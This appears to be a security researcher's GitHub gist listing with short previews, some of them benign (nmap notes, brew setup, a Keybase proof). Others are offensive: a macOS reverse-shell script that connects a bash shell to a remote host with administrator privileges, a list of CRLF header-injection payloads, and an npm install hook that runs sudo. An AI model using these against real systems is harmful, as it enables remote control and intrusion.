Vladimir Metnew (Metnew)
Metnew / package.json
Created December 21, 2018 02:09
Experiment with permissions when installing malicious packages
{
"name": "saferoot",
"version": "0.0.1",
"description": "",
"main": "index.js",
"scripts": {
"install": "sudo id",
"pre--install": "#sudo npm i --unsafe-perm"
},
"author": "",
Metnew / CRLF.txt
Created December 20, 2018 03:01
CRLF payloads
%0AHeader-Test:BLATRUC
%0A%20Header-Test:BLATRUC
%20%0AHeader-Test:BLATRUC
%23%OAHeader-Test:BLATRUC
%E5%98%8A%E5%98%8DHeader-Test:BLATRUC
%E5%98%8A%E5%98%8D%0AHeader-Test:BLATRUC
%3F%0AHeader-Test:BLATRUC
crlf%0AHeader-Test:BLATRUC
crlf%0A%20Header-Test:BLATRUC
crlf%20%0AHeader-Test:BLATRUC
Metnew / THAT IS A FALSE POSITIVE
Last active February 14, 2019 02:59
FALSE POSITIVE
aws_access_key_id = AKIABTFXD4NW55DB7X3423
Metnew / readme.md
Last active December 14, 2018 01:40
user -> root!
  • elevation of privilege
  • password exploits
  • incorrectly set permissions
  • leveraging SUID/SGID programs
  • code injection
  • trojaned commands
  • PATH exploits
  • misspelling exploit
  • symbolic link exploits
  • document exploits
Metnew / available_domains.json
Last active December 12, 2018 02:47
all available domains (dec 18)
[
"app",
"cloud",
"com",
"guide",
"io",
"net",
"online",
"org",
"plus",
Metnew / nmap-hero.md
Last active December 12, 2018 14:10
Nmap for haxers, <your_tool> for scriptkiddies.

NMAP hero

-F (Fast (limited port) scan) Specifies that you wish to scan fewer ports than the default. Normally Nmap scans the most common 1,000 ports for each scanned protocol. With -F, this is reduced to 100.

Nmap needs an nmap-services file with frequency information in order to know which ports are the most common (see the section called “Well Known Port List: nmap-services” for more about port frequencies). If port frequency information isn't available, perhaps because of the use of a custom nmap-services file, Nmap scans all named ports plus ports 1-1024. In that case, -F means to scan only ports that are named in the services file.

Metnew / gist:09a50c38d398c482b2df59082f0d13c6
Created December 6, 2018 17:47
macos-reverse-shell.sh
# C2
# nc -l 1337
# Root
osascript -e "do shell script \"bash -i >& /dev/tcp/client.ip/1337 0>&1 \" with administrator privileges"
# User
bash -i >& /dev/tcp/client.ip/1337 0>&1
Metnew / brew-my.sh
Created December 1, 2018 00:52
minimal brew commands to start
brew update
brew upgrade
sudo nvram SystemAudioVolume=" "
sudo -v
brew install nano
# brew unlink nano && brew link nano
brew install jq
dropbox
-----BEGIN PGP PRIVATE KEY BLOCK-----
-----BEGIN EC PRIVATE KEY-----
-----BEGIN DSA PRIVATE KEY-----
password
credential
Metnew / keybase.md
Created October 28, 2018 15:04
keybase.md

Keybase proof

I hereby claim:

  • I am metnew on github.
  • I am metnew (https://keybase.io/metnew) on keybase.
  • I have a public key ASARCDaHnKF8_DpR8aRWgXgFF83kdL8nJoYPE2AhYwIn5Ao

To claim this, I am signing this object: